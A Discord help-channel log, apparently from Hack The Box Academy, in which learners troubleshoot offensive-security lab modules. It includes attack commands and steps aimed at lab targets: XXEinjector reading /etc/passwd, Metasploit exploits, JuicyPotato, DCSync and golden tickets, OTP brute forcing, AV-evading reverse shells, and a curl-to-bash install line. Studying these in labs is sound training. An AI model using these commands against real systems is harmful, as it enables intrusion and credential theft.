#modules
Module: Active Directory Enumeration & Attacks
Section: Skills Assessment Part I
I used an SMB share to transfer files from my Linux attack host to my Windows target. I was able to successfully copy the files I wanted over. A little while later, I tried accessing the share that I had mounted as N: but only some hidden .vscode directory was showing now.
So, I navigated back to the C: drive and tried to unmount the share using the command
net use n: /delete
But it just hung.
This has happened a couple times. Normally the command works for me.
it depends but depending on how you're accessing the target; evil-winrm has an upload function, xfreerdp has the /drive: option
i've also generally never mounted a share to windows
The SMB share was running using Impacket on my Linux attack host and I mounted it on the Windows target.
i mean: what tool are you using in the first place to access the windows target?
Oh, what's your preferred file transfer method? Cuz I tend to use the method I described quite a bit and usually it works fine.
I have a reverse shell connection.
i've generally used just a web server
or leveraged whatever tool i'm directly connected to the target with
I had established the reverse shell, mounted the share, transferred files, and then a little while later when I tried to access the share again, it was like how I described.
¯\_(ツ)_/¯
Welp
i always transfer all tools i feel i'll need over at once
I see.
it could just be a weird restriction with the revshell
Funny that it starts acting funky after I've already mounted and transferred files once 
¯\_(ツ)_/¯
Thanks anyways.
just weird shit with revshell stuff
I suppose so.
Arbitrary file uploads are among the most critical web vulnerabilities. These flaws enable attackers to upload malicious files, execute arbitrary commands on the back-end server, and even take control over the entire server and all web applications hosted on it and potentially gain access to sensitive data or cause a service disruption.
far out. i knew what to do, but that was so finicky. took hours to do the assessment tbh lol.
@fathom pendant is there a specific section you'd recommend I exfiltrate the C:\Tools\ folder from? Or is any section in the AD Enumeration & Attacks module fine?
I haven't really paid attention to whether that folder varies throughout the module, that's why I'm asking.
all of them have the same C:\Tools\ because spoiler ||the same target is reused throughout the module||
Ah alrighty, I figured as much since the IP address and stuff seemed the same. Thanks!
can someone help me with the command injection module, on the detection part of it. i am trying different payloads like ; and /n and && and 127.0.0.1; and 127.0.0.1/n && 127.0.0.1&& but nothing is raising an error (that's what it's supposed to do)
sure
you're entering the payload into a web app, so are you using the injection character itself or the url encoded character?
hi guys its that time of the day where i get stuck on a module
https://academy.hackthebox.com/module/144/section/3075
I am on the second question, and I am kind of confused on what CMS is. I googled it and there was like 3 different things.
it's a content management system
they are supposed to be user friendly software that allows users to create, manage, modify content without requiring specialized technical knowledge. think like wordpress. they have templates and stuff making it easy for users to build and maintain websites with pretty much zero coding knowledge.
pretty sure godaddy just uses wordpress
oh
but who knows they may have their own
okay thanks
i know they have wordpress for sure though
Module: footprinting
Section: DNS
I've discovered more than one domain I can go through, one being "root.inlanefreight.htb" and "inlanefreight.htb", however I cannot seem to access the websites even though I've added them to my hosts file
That's because there aren't webservers running on those subdomains
that's got to be false, i've pinged the domains and the subdomain and it gave a response back
alright i got it
weird ah name but i wont ask questions
ping doesn't tell you if an ip is hosting a website or not
yes i know but it shows if it's up or not
no it doesn't
if the server accepts ping requests then it simply returns the amount of time it takes for the data to travel to and from said server. a server/computer could be configured to not reply to ping requests.
yes your picture shows exactly what i just said
Ok but I don't know why i cant even view the sites
ping has zero to do with websites
because they're not sites.
you can ping 127.0.0.1 on your windows box, but if you navigate there in a browser you're not going to see a website because your windows box isn't hosting a website.
this section will have 0 to do with websites
and all to do with using dig
or nslookup
but even if i was to add it to my host it just claims server cant find it
because you need to also provide an ip for it to look against
ah right
dig is a better tool
also when i do a zone transfer there's no TXT for me to submit
but since inlanefreight.htb isn't a publicly routed website, it can't be queried without telling the tool what to query it against
because there's somewhere else you can transfer to (hint. it's not root)
also you misread the SOA file
there is no root.inlanefreight.htb; that's the admin email -- root@inlanefreight.htb
im not using root for dig i've used the normal inlanefreight.htb
im assuming it's just gonna be for ns.
why are you assuming?
it's just showing me ns
dig axfr inlanefreight.htb @ip
look at the list; there should be an entry that stands out for you to try and dig further into
im also refering to question 2
question 2 can be answered in the same way
¯\_(ツ)_/¯
in fact most of the other questions are answerable by just doing the thing
there are different types of records; one being the ns record
a zone transfer will retrieve all records on the host
also remember, when you query a server, you're seeing records relative to it
can anyone tell me how do i learn hacking discord servers ? which resources should i follow ?
none. Read #rules
Lmao
what you're asking for is illegal my guy
also when it says "format: HTB{...))" do i have to do this
HTB{answer}
it's telling you what the answer will look like
Oh
that way you're not just guessing "is this the answer?"
yeah
i wanted to take revenge on a guy, i will just find a black hat hackers group/dc server
Typically it's a flag
https://discord.com/security nah they have a bug bounty program
then again no black hat will be able to just "hack" a discord server, you're just wasting ur time
Bro is the type of guy to ask, "can you hack Instagram?"
lmao i am just asking for resources
i dont use it
this discord server is about the hack the box platforms, not hacking stuff like discord. you likely won't find much help here.
good luck finding a public one
thnx
This is not a black hat hacking group. Even if you do find a black hat group, like you said, they'll probably laugh at you when you ask them to teach you to hack discord.
And if anyone ever tells you they'll help you with this, you're getting scammed.
bros gonna accidentally get his own shit rooted by hackers
yeah you're just going to get scammed.
anyway @rustic sage do a base zone transfer; then just dig against all found A records until it works (note: this is serious, there's a small list so you don't gotta fully automate)
but they seem useless
because chatGPT doesn't know what it's doing
okay thank you
when you mean by a "base" zone transfer, do you mean just do a normal zone transfer?
You can't hack discord dude.
that's what i said to him
Unless you're a state backed highly intelligent group of hackers, you're probably not hacking discord
dw wait till hackthebox makes a discord server privilege escalation module
You are far outside your depth of knowledge. Trust us when we say just forget about it. Don't pursue some "black hat hackers" online to "hack discord". Again, this is also not the place for this kind of stuff.
so can i just hack the owner's account
nah bro ik how to do it check the hackthebox site they actually released a discord server privilege escalation module for only 100 cubes
ok thnx
ik
Gonna be honest, sounds like you have brainrot from media or something which makes you think hacking is some kind of technowizardry that can just do anything. Just give it up, drop the topic.
the most i have done is hack a wps protected wifi by running a script
Definition of Script Kiddie right there
i feel personally attacked
ngl being a script kiddie helps a little
it is. the darkest of wizardry. everyone else are but muggles π
yes
oki
when i refer to base n it generally means without modifying commands or doing anything extra
so just for these ones?
yes except the ns one
oh yeah i know
just go through that list until you get the right thing :)
thank you, ur the best
you'll note that some other answers can be answered from this response of where you can axfr to
yeah
transfer has failed
you'll get a fail on all except one
LET'S GOOO
the answer does say "determine IF you can"
oh yeah true LMAO anyways thank you so much i appreciate ur help
so long
it's been 5 minutes already and i've not gotten any results so far
maybe ip address is flagged do you think?
nope
you're not looking in the right spots
much like dig; dnsenum can also bruteforce subdomains
you already can zone transfer to inlanefreight.htb and you know another you can transfer to
so try the other subdomains (also you'll need a more fierce list)
my list has so much inside
i might have to wait, it gave me another domain on 127.0.0.1
well that list doesn't contain the answer
wont know until it's done completely
I know
and i'm telling you; you're wasting time
but by the looks of it, it's showing me it's still going and it shouldnt take this long
yeah i'ma have to find a new list
this was a hint
... take into consideration the word I emphasized
but also you won't get it by bruteforcing inlanefreight.htb
you'll get it via a subdomain.inlanefreight.htb
you have the list of subdomains in front of you
are optional exercises really needed in order to learn what was mentioned in the section? i mean i'm stuck in the linux fundamentals container optional exercise and it was very complicated and also time consuming for me, so i'm confused about whether i can skip it or whether it is necessary. your opinion might help.
you can skip it
the optional stuff is just to help you get a better feel for the stuff
okay, thanks for your opinion.
Just wondering about the stack-based buffer overflows on linux x86, I have a question. How do I overwrite the EBP and EIP? I've tried the command as shown, and the other commands as shown. I can't get it to overwrite in gdb with the print command
ok let me try that, thanks
i mean i also see him using run #(python ...) instead of run $(python...)
I do this because of the error I get when I use a lower lvl prompt.
that's weird
I was stuck bruteforcing OTP in api attacks broken authentication. Can anyone help me?
the vm for the citrix breakout windows privesc module seems borderline unusable. it's like watching a slideshow in slow motion
Think of another method
Since the OTP format is not clear
goodmorning yall
What is up
i need help with my metasploit module
i was asked to use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents but when i ran it i got this error
but hints say "Focus on the POST endpoints /api/v1/authentication/customers/passwords/resets along with /api/v1/authentication/customers/passwords/resets/email-otps or /api/v1/authentication/customers/passwords/resets/sms-otps." so what do you recommend ? I tried brute force password but I couldn't do it.
your LHOST isn't set
oh sorry about that im new here
set LHOST tun0
ok so if i set it.....it should work???
yes
the target doesn't have a route to the public ip 94.237.54.7
it does have a route to your tun0 ip (10.10.x.x)
oh worked
i tried the show options on the exploit but it didn't bring out a LHOST option so i thought it wasn't necessary
if it's RCE/reverse shell, it is
also options is just the command
it's towards the bottom after all the target options
this is the error I get when using standard $
well you need to specify python version
ty let me go do that
I'm sorry, I misread it. I think you are working on a broken authentication module
So I use python 2.7? By changing the $path variable?
as far as I'm aware people that have done this have said that Bruteforcing isn't the solution
if it's not in your path
ok thanks
yes the section broken authentication in the module api attacks but i was stuck and don't know what to do next
how do i change directory to desktop? i tried cd but it didnt work
try dropping into a shell first, then try cd
(you're in a meterpreter shell, not a cmd or powershell)
shell
then you can move around
i did that and was able to get to desktop how do i open/download the file?
.
type flag.txt
type flag.txt
...
the command is "type"
^
then the filename
you're missing some windows basics there bud
my bad
also you don't need to type shell when you're already in the windows command prompt
thanks for your help yall
if you want to download a file with msfconsole that's done outside the shell
i was legit thinking i could switch back to meterpreter shell
all good mate. it can be confusing at first, but it gets easier.
exit
thanks man
noted
i suggest the information security foundations path before you do any other modules
^ this. then you'll be back to 'Meterpreter 1' which shows you're in the msfconsole again. then if you want to, you can background the session. but that is beyond your needs right now.
then in the meterpreter console you'd type download C:/path/to/file
definitely agree with this. if you're unfamiliar, take the time to do the fundamentals. it'll mean you'll absorb more info when you do the modules and not just spam copy/pasted commands.
and you'll spend less time trying to get through basic hurdles
the hardest part of any module should just be executing the technique itself
how much cubes will it cost me?
they're all tier 0 modules
so they'll give you the 10 cubes you spend back on them after you complete
bruv fr i could have legit sworn my vn was broken
I tried setting up alias to shell using terminal command alias python=/usr/local/bin/python2.7
i will study the module thanks once again
Still can't get it to go to version 2.7
¯\_(ツ)_/¯
likely best to do it in a venv
as python is actually pulled from /usr/bin/python
which is usually symlinked to your highest python version
ok will install 2.7 and downgrade ty
i wouldnt recommend that. look at pyenv
i don't recommend downgrading
as it will break all of your other tools
if you downgrade you will likely break other packages
ty I will look into this
does academy have a paypal option? currently if i click update payment method it only shows credit card. it's probably because it is the current method
just do sudo apt install python2.7 you can have both python at same time
I believe so
ask support to remove your current method
wont it remove after it expires?
not sure
it shows only credit card ( the sub got expired just now )
Best to ask support as it is a billing matter and they do not monitor Discord. I remember being able to select PayPal a little while ago
are you sure that its on academy, i was able to get paypal on main website
yes, I am sure
oh ty, i have asked the chatbot but it says they will mail and no one is available now
they should get online soon
anyone had issues installing bashfuscator?
Hello! Could someone please help me with this issue I've had?
I'm at the windows fundamentals module at the section about shares and ntfs permissions.
I've used RDP to log into the target and made a share. The funny thing is that from the pwnbox I can't access it, or ping the target machine. Pinging the pwnbox from the target gives a positive response and I even captured the packets with tcpdump on the pwnbox. Does anybody have any idea? I was left with none and chatGPT doesn't know a thing. Thanks for your time! :))
PS: I made an inbound rule on the target to let traffic from that IP pass, it still doesn't work
Hey
I started learning python and I want like to do some tasks to actually see if I have actually learnt anything
You can try the exercise in the module, building that program that makes a wordlist from a website, it might help
If anybody has any idea, please let me know, here or DM.
Thanks :)
Where is it
https://academy.hackthebox.com/module/88/section/914
I think this is the one
how are you trying to access the share
smbclient
But the thing is that I wouldn't be surprised if that didn't work, but even ping doesn't work
what's the command
sudo smbclient -L IP -U htb-student (I put in sudo just to be sure)
It's the same command as suggested by the course
have you tried \\IP?
the full command pls
sudo smbclient -L 10.129.190.245 -U htb-student
smbclient \\\\SERVER_IP\\Company Data -U htb-student
either //IP/Share or \\\\IP\\Share
sudo smbclient \\10.129.190.245\Share -U htb-student
Password for [WORKGROUP\htb-student]:
do_connect: Connection to 10.129.190.245 failed (Error NT_STATUS_IO_TIMEOUT)
Can I have some assistance for the below module:
Name: ACTIVE DIRECTORY TRUST ATTACKS
Section: Unconstrained Delegation
I was able to get a TGT for DC01$. With the TGT I have done a DCSync attack where I was able to retrieve the NTLM hash of krbtgt. With this hash, I have done a golden ticket to forge a service ticket for the Administrator user in the inlanefreight.ad domain. I am able to list files on \\DC01.inlanefreight.ad\C$. However I don't have the permissions to list files in \\DC01.inlanefreight.ad\C$\UCD_flag where the flag is located.
Yo, so INTRODUCTION TO MALWARE ANALYSIS , debugging section, inetsim file does not exist
what should I do? I am not able to continue with the exercise
this is on the pwnbox
for some reason the default firewall is blocking smb, that's a problem with the module I think, for now you can turn off the public firewall and you will be able to access the network share
also again either //IP/Share or \\\\IP\\Share
Alright, I'll check it out, thank you
OK IT WORKS
Thank you!!! :))
just use DC01$ to access the flag
wdym? use the TGT of DC01$
yes
can I DM you?
what for
you have DC01$ yes? just use that ticket to access it
they have mechanisms in place so that only specific accounts can access the flag
I have the TGT for DC01$ but I can't list files in \\DC01.inlanefreight.ad\C$\UCD_flag
am I missing something here?
that's not the right path
submit the flag located at \\DC01\UCD_flag\flag.txt
C$ requires admin rights
can I DM you to sort it out?
hello
im at the noriben module in malware analysis
i use procmon to find the tcp udp traffic of the shell.exe
but it doesnt produce any traffic to any ip
has anyone figured it out?
svchost for example has a lot of traffic
can someone help me with login brute forcing website skill assessment. ive gotten to the admin login page but when i try to run hydra on the login form, i get "all children were disabled due to too many connection errors"
where i filter shell.exe there is nothing
works for me
got it thanks
nvm figured it out
is it just me or is anyone getting absolutely nothing but 0s in all the stats of hackthebox.eu in waybackmachine?
Hello, I'm completing some of the easy modules and in the Windows fundamentals module I get an error from submitting the right SID on the last two lecture questions. Is there some kind of bug or should I change the format of the SID somehow?
(as an example for bob.smith sid I have S-1–5–21–2614195641–1726409526–3792725429–1003)
I get the same error on the skills assessment SID questions even though I've placed the correct SID
In standard SID notation, the separators should be hyphens (-) rather than en dashes (–). This subtle difference might be causing the submission error maybe...
oh yea that was the problem, thank u
hello, not sure if this is the right place to ask, but is anyone else having issues spawning targets in the academy modules? Password Attacks - Pass the Hash, to be more specific
Try switching to a different VPN region
I have already tried that, but no success. Thank you, though
us4 works
took a while, but it spawned on us4. Thanks
Hi ! I'm working on the "INTRO TO WHITEBOX PENTESTING" module - section Skills Assessment.
I've found one of the RCE methods but am looking for the second one.
Can anyone nudge me?
I've done a few of the introductory paths, intro to basic toolkit and intro to information security and now working my way through intro to pentester. I'm just wondering does this click further down the line, I'm only at footprinting but I try to do easy boxes on the main platform and still struggling with them
I found retaining all the information in footprinting a challenge also, but I think it will come with practice in future modules. Personally I feel like completing the modules first is what will allow me to rank up more easily on HTB because they show you the process from A to Z. Anyways you're not alone keep your chin up!
Yeah it is a large module with a lot of info, I'm using academy alongside my uni studies as I'm going into second year and apparently it ramps up in difficulty quite a lot, so trying to be better prepared! Thanks for the reassurance
$ ruby XXEinjector.rb --host=10.10.16.106 --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
hey guys i did the command up above as shown in the xxe automation part. i've saved the modified request in tmp and named it xxe.req, my vpn ip and named port, stated the file i wanna read, also the filter and out of band flags, but still the response i'm getting is this: -> XXEinjector by Jakub Pałaczyński
Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit
[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML.
[+] Responding with XML for: /etc/passwd
[+] Retrieved data:
[+] Nothing else to do. Exiting.
now when i'm looking for the logs they're non-existent, i dug deeper into the xxe folder and found a log folder but it's empty
does getting domain admin means you can compromise domain controller?
Yes
already compromise*?
Hi, I'm having issues with the Windows Privilege Escalation Skills Assessment - Part I. I managed to get a reverse shell as an unprivileged user, and noticed I have the SeImpersonate privilege. I'm using JuicyPotato to exploit this, I have also found the valid CLSID to be passed in as an argument to the JuicyPotato binary, but I am unable to get a reverse shell as System. Here's the command I'm using and its output:
And visibly I receive no connection.
Any help?
Hello everyone, I am on the Information Gathering (Web): Web Archive module as in the Penetration Tester Job Path.
So far I have completed all other questions except the first and second.
For the link I have changed from hackthebox.com to hackthebox.eu as instructed.
The first asked about the amount of pentest labs HTB had on 8th Aug 2018,
and the second asked how many members HTB had on 10 Jun 2017.
And from the screenshot attached here, I saw none from the wayback machine as from web.archive.org.
Has anyone experienced the same issue in this module?
check your url? read the question, scroll down and search more
I saw my mistake there, thank you
i recently completed this
bro if u face any issue u can dm me i can help u with approach
Anyone available to assist with Windows Privilege Escalation - Windows Server? Having trouble with the rundll32.exe command.
Hi everyone! I'm totally stuck on Attacking Common Applications - Skills Assessment II - "What is the admin password to access this application?". From what I understand from the forums the way forward is to create a Gitlab account but when I try I just get error code 422.
Just wanted to check if I'm on the right path with this?
Hi ya, can anyone help for Windows Evasion Skill Assessment 2 ? I'm able to get reverse shell by executing the VB Script directly on target box, but was unable to get it via trigger and therefore escalate to another user...
@fathom pendant hey im having issues finding the wordlist for the SMTP part
Have you tried the wordlist from the resources button?
O
I didn't know that was a thing ngl
thank you though appreciate it a lot
anyone?
I need help to clear "Information Gathering - Web Edition Skills Assessment". I was able to answer 2 out of 5 and unfortunately, I'm stuck. Nothing seems to work whenever I try to using scrapy, finalrecon, gobuster. Can you please point me in the right direction without disclosing the answers? Here's my hosts file to start:
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
83.136.254.169 inlanefreight.htb
whats your gobuster code?
gobuster vhost -u http://inlanefreight.htb:34024/ -w /home/kali/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt -p pattern -t 50 | grep -Ev "Status: 400"
gobuster dir -u http://94.237.58.196:59272 -w /home/kali/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt -t 50
the first one is on the right track. try make it simpler π
look at the virtual hosts module again
I see, thanks for confirming. Perhaps you can give an example? Also what about crawling, I can't seem to make it work.
Sure DM me
Dm sent.
Not sure why inlane freight wouldn't be the answer, it does say organisation name is to equal as that
nvm
Don't need a pattern, you do need a bigger list
i figured out why that wasnt correct i got the answer
Limited information
Hello everyone
I am working on the Information Gathering - Web Edition skill assessment
whois inlanefreight.htb
No whois server is known for this kind of object.
I got the above error when running the whois command
anyone know what's wrong? I already added the domain name to /etc/hosts
did u try to add it in the /etc/hosts file?
there are other services out there u can use instead of whois
but whois doesn't work
to retrieve your answers
inlanefreight.htb is not a real domain, you won't find it on whois
but the solution of HTB is using it
The ".htb" top-level domain is not a standard public domain.
Whois searches public registrar info, inlanefreight.htb isn't a public website
Are you sure it's not inlanefreight.com?
Of which that is a real website
vHosts needed for these questions:
inlanefreight.htb
- 1 What is the IANA ID of the registrar of the inlanefreight.com domain?
inlanefreight.com is public, inlanefreight.htb is not. It confused me aswell
Yeah it's inlanefreight.com
The question says .com
Reading the question helps
this is so confusing
Not really
TRUE
I read it, just did not catch the .htb and .com change
Then you didn't read carefully
for the client side validation part of the file uploads module i am trying to click the upload button but it doesn't let me upload a file, it's as if the button has been disabled even though it's not, can someone pls help me?
¯\_(ツ)_/¯
cute cat btw
Thanks
have you tried clicking on the portrait?
ooooohhhh, no way. thank u (it works)
The upload button sends the request to the server
do you guys have a full time job? I started my subscription in February and only completed 25% of the CPTS modules, am I too slow?
Nah
hey, wayback machine is dead ?
use .eu and scroll
No
guys does reconspider supports alternative port than 80,8080 or 443?
curl --head http://web1337.inlanefreight.htb:33555/admin_h1dd3n
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.1
Date: Wed, 10 Jul 2024 16:01:22 GMT
Content-Type: text/html
Content-Length: 169
Location: http://web1337.inlanefreight.htb/admin_h1dd3n/
Connection: keep-alive
can anyone tell me why the final slash is so important?
without that slash, we cannot get the content
You mean the /admin?
/admin_h1dd3n and /admin_h1dd3n/
you see the difference, the final slash is important
without that slash, we only got HTTP 301
Bc admin_h1dd3n is probably a directory and not a file
this can be considered spoilers for the module btw
It's not allowed?
I think modules are just for learning and practice, it's not the exam
the subdomain prob
In exam, sure, we shouldn't cheat
how to download a file from pwnbox
pwnbox has internet connection
You can upload to a temp file website
Then download from there
There's ssh creds on the desktop, you can just use scp
ooh ty
Information Gathering - Web Edition
Skill Assessment
I am currently stuck at question 3 of the skill assessment.
I have attempted gobuster directory brute-force and vhosts enum on the target machine for now.
I appended 94.237.59.199 inlanefrieght.htb
at the end of /etc/hosts (the site can be reached via firefox as http://inlanefreight.htb:50304)
I also tried ffuf on the target too but that yielded no results (ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://94.237.59.199:50304 -H 'Host: FUZZ.inlanefreight.htb')
I configured and installed reconspider on pwnbox and it successfully ran against the public site of inlanefreight, but no luck on the .htb version of it within pwnbox. As it doesn't yield anything within its results.json unlike its attempt on the public site.
python3 ReconSpider.py http://inlanefreight.htb:50304
There isn't any robots.txt within the target site either. Can you guys provide me with some hints of your exploration on that target?
Thanks for reading this wall of text lol.
did you find the subdomain
sadly no for now..
your ffuf looks fine it is supposed to find a subdomain
make sure you used the right filters
Module: Active Directory Enumeration & Attacks
Section: Skills Assessment Part I
https://academy.hackthebox.com/module/143/section/1278
I've used SharpHound.exe from the initial Windows target to gather data and now I'm trying to upload it to BloodHound but it just stays at 0%. I've tried several times. Anyone got any idea why?
i think you need compatible versions
it gets stuck at 0 if you use incompatible versions
How do I ensure the versions are compatible?
if you're using legacy bloodhound, the repo has a folder called "collectors", inside there is the sharphound you want to use
Would like a point in the right direction for the Microsoft Defender AV Bypass - Dynamic Chapter.
I'm suppose to create a reverse shell and then read a file on another user's desktop for the flag. I created the RShell, compiled it, and placed it in C:\Alpha\dynamic. It passes the AV check, a process starts my shell, then it dies 45s via a timeout. I thought it might be the IP and port since they are args in the program and I never supplied them, so I hardcoded them. Again, compiled, and placed into the correct folder. Checked the log. A process starts my shell, then it dies 45s later. tshark also shows no incoming TCP packets from the victim to my attack computer, only the RDP connection. I can ping my attack from the victim. Wondering what I should look at next to figure out a solution.
i dont remember but you have to install them from same place, check its readme
also when you run sharphound it will tell you the version it's compatible with
do you have your own windows vm to test with
Yes
does it work?
Review the section again, it also goes over micr0_shell
I just saw this on the first line of the output of SharpHound.
2024-07-10T09:38:46.5638037-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
I just checked and my BloodHound is running version 4.3.0
How do I update it? I've already tried sudo apt install bloodhound
Does the solution 3 not work? I understand there are multiple solutions. i want to do them all and am starting with the 3rd.
bh 5.0 above is community edition, it's moved to using docker now
https://github.com/SpecterOps/BloodHound I personally like it more but if you want to use the older version you'll need to use a older collector
Up to which version is this SharpHound recommended for?
that sharphound should work for your version of bloodhound
The rshell method requires args to be passed to it, does the script checking your method also pass args to your program?
Ohhh, I'm not familiar with how to use docker. I think I'll stick with the older one then. So I just use the SharpHound from the collector folder?
yeah it should work or you can grab it from https://github.com/BloodHoundAD/SharpHound/releases v2 should be fine
Does anyone want to buy a Fortnite account
no
<@&861185840277487616>
I'm assuming I'll have to switch eventually to the docker version of bloodhound. Guess I should learn it then.
I thought this might be an issue. So I thought I wrote my program to just ignore it. Maybe it's not doing that. I'll take a look at that as well. Thank you both.
v2.0.0?
this should work
ty
Ignoring the args will have no way to go back to your host unless you hard coded the variables.
Why did I get pinged for this?
Btw is there a link to only git clone a specific file, like this one in case? I normally wget the raw for scripts.
uh, you shouldn't have
Well I got
huh
A notification
wget works too with the download link
yeah
Thanks. Just to clarify, there's no issue with the pre-docker versions of bloodhound yeah?
nope
@shut quest It was the args. I left the if args != 2... and I assumed the program was working because the logfile said it timed out. I removed the check for args, hardcoded the ip and port, and it worked. Thank you so much. @next bronze
Maybe the next section explains this, but I was able to run a powershell instance as another user. Was this because beta was executing my reverse shell, allowing me access to its permissions, or was this a LPE I don't understand. @shut quest
Each of those folders has a different user running the executable placed in it
That makes sense. Thank you @shut quest
Module: Information Gathering : Web Edition
Section: Skills Assessment
I have continued the vhosts enum via ffuf
ffuf -w /usr/share/seclists/Discovery/subdomains-top1million-5000.txt:FUZZ -u http://94.237.59.199:50304 -H 'Host:FUZZ.inlanefreight.htb
and directory bruteforce via gobuster
gobuster dir -u http://inlanefreight.htb:50304/ -w /usr/share/seclists/Discovery/Web-Content-combined_directories.txt
Neither has yielded any results; could there be any possible mistakes within the command itself, or is it just the wrong wordlist?
Added 94.237.59.199 inlanefreight.htb into /etc/hosts already.
Both of your commands are incorrect, review the section where these are provided and review piece by piece to find out what's wrong.
Strangely enough when I used wget on this link compared to when I downloaded it directly from the browser, I got two different sizes... The first one is the wget and the second is direct download from the browser. @next bronze
Also sometimes you need a different/longer word list.
ah wrong link then, you need the raw file as always
Raw works for executables? I'll test it out.
raw just shows whatever data blob is on the server, it works for any file types
Can use file to quickly identify that one would be ASCII/text
Yup, worked, thanks.
Thanks!
wait they said show results tho
that's not right there should be a bunch of them
If my memory serves me, missing a flag for gobuster and the IP should be a host for ffuf
Guys I got a cache file from chrome that is flagged as a virus. It happened while I was on academy pwnbox. I didn't download anything from the web. Is it possible that chrome/windows flagged it bc of HTB?
@next bronze regarding BloodHound, I'm currently using Pwnbox so it has the 4.x.x version installed. If I'm going to be using my own VM and I want to use the pre-docker version, I'll have to download it specifically from the repo, right?
if you wanna set up docker def do it in your own vm
I just meant that if I wanted the older version (pre-docker), I'd have to download it from the GitHub repo, right?
kali should have it installed by default but yeah you can install it yourself if it isn't
I like CE because you can set it up to access using any devices in the network through the browser
Can you mark as owned in CE now?
yes
./program.exe
Just ran it with the syntax .\SharpHound.exe and it worked. Thanks.
<@&861185840277487616> other channels too
Great job. Thanks for letting us know!
can you help me please?
What seems to be the problem?
last two days my discord account sends scam links to all my servers, maybe my account token was stolen. I changed password and regained access to it. so I got banned
Wait a sec.
Can you please DM me?
what's the alternative to sudo apt install python2.7? that's what academy says i should do, but 'no installation candidate'. searching it up returns the same command
when i try to use python server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 without 2.7 attached, it still results in syntax error so i assume python2.7 isn't on pwnbox either
i'm using the latest parrot os
In the Live-Debugging section from the Advanced SQL Injection module I am running into the following problem. After decompiling the jar with fernflower and starting the remote debugger, the line numbers appear to be out of sync; as a result, when I place a breakpoint, it breaks/pauses on a different line. Did anyone find a way to get it back into sync?
Hi,
I am doing the Documentation & Reporting Practice Lab
but now the DC @ 172.16.5.5 is not there, yesterday it was there, I already reloaded the lab but it is the same
Is it a technical problem?
Can't run tplmap.
https://academy.hackthebox.com/module/145/section/1344
Is there any other tool to automate SSTI? tplmap's dependencies aren't installed on the PwnBox, tried to use a python3 venv but it seems a dependency needs python2.
Can't install python2 on PwnBox due to some other error.
And even running locally I encounter this error "TypeError: method expected 2 arguments, got 3"
Installing python2.7 on pwnbox, ignore the warnings about missing extension, just run everything here
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7
pyenv shell 2.7
python --version
can someone help me with the xxeinjector automation?
Any tips on being able to run the LinEnum.sh script on the getting started module, last task "knowledge check"?
Transfer from your machine to it, but tbh linenum isn't required
One of the first few things you should do as a user is see what you can (su)do
Alright thank you! Was just going to follow the steps but I've had some other ideas
Hey dude i was stuck on this for ages as well, you have 5 mins from requesting the OTP to do your ffuf, first time i requested the OTP and then went off to make the payload and wondered for ages why it wasn't working, the OTP list i just made a list of 1 to 10000
for ((i=1; i<=10000; i++)); do echo $i >> OTPlist; done
Long shot but did anyone take notes on the Password Attacks module? Specifically Sam's password from the Password Mutations section? The following module wants you to reuse the creds for a foothold but I didn't take notes and it's been a few weeks. Thanks
Steps? I don't believe that this lab is guided
Just regrab it
You should always save creds in modules, never know if they're gonna get reused later
Yeah hindsight is 20/20, what do you mean by regrab it?
...just reattack the service to grab it
It's not like it magically stops existing
Right... kinda the point of asking here before I do that
As a note; the linux envs and the windows envs are the same throughout this lab
No one is just gonna hand it to you
Lol thanks for your help
Just gracefully take it as a lesson for future
You can use 48 threads safely in this module against most services
You should be using the mutated password list
Also don't attack ssh
Ssh is painfully slow and it's likely dropping connections
If someone who can actually help sees this please DM me
did anyone have problems with Attacking common application module - attacking tomcat section ? credentials don't work!
worked now! after resetting the lab and getting a new IP address
ran them by script, and one by one on both pwnbox and vm. this is a nightmare
some of the extensions are missing but that's fine
just run the rest
I've tested it and it works
can you run the rest of the commands buddy
yup
python --version what do you see
the screenshot shows that i've run the rest of the commands by the python --version showing Python 3.11
~
I just spun up a fresh pwnbox, ran all the commands and it worked
this is an ongoing issue since i do academy
thanks
your error is a timeout error meaning it's timing out before it connects
btw what's up with the new pwnbox image? lots of broken stuff especially python, and python 2 is not even in the apt repo
i don't work here blame @indigo rock ¯\_(ツ)_/¯
I'm having trouble with the third problem in this section: https://academy.hackthebox.com/module/39/section/415. I have a meterpreter shell on the target machine, and I've tried to use linux/local/sudo_baron_samedit (privilege escalation to sudo). But the baron exploit requires x64, the first exploit to get on the system (exploits elfinder) supports x86 and x64, but it only works with x86, saying this if I try to use x64:
[-] Did not receive a response from elFinder
[-] Exploit aborted due to failure: unexpected-reply: Upload was not successful
This makes a conflict so that I cannot use the x64 baron sudo exploit. What am I doing wrong?
don't worry about the dependency
just follow the steps
get initial session --> ctrl+z --> switch to privesc exploit --> bind it to the session
do I do that just by setting the SESSION option?
yes
set session N where N is the session that your reverse shell is in
if you're unsure just type sessions to get the number
I did that
and it exploits, but doesn't spawn a session
another one
I also make sure to set LPORT to something different
make sure the LHOST is your tun0
thank you. I thought I set it properly, but it must've reset when I accidentally restarted msfconsole. not sure how that happened
LHOST is my new enemy
it defaults to the eth0/enp0s address
same problem as last time I asked for help
has anyone else had trouble staying connected to their academy labs lately? for the past few days the connection has been super spotty
use tcp vpn; change vpn regions
i've tried switching regions a few times but i don't remember if i've ever tried using tcp
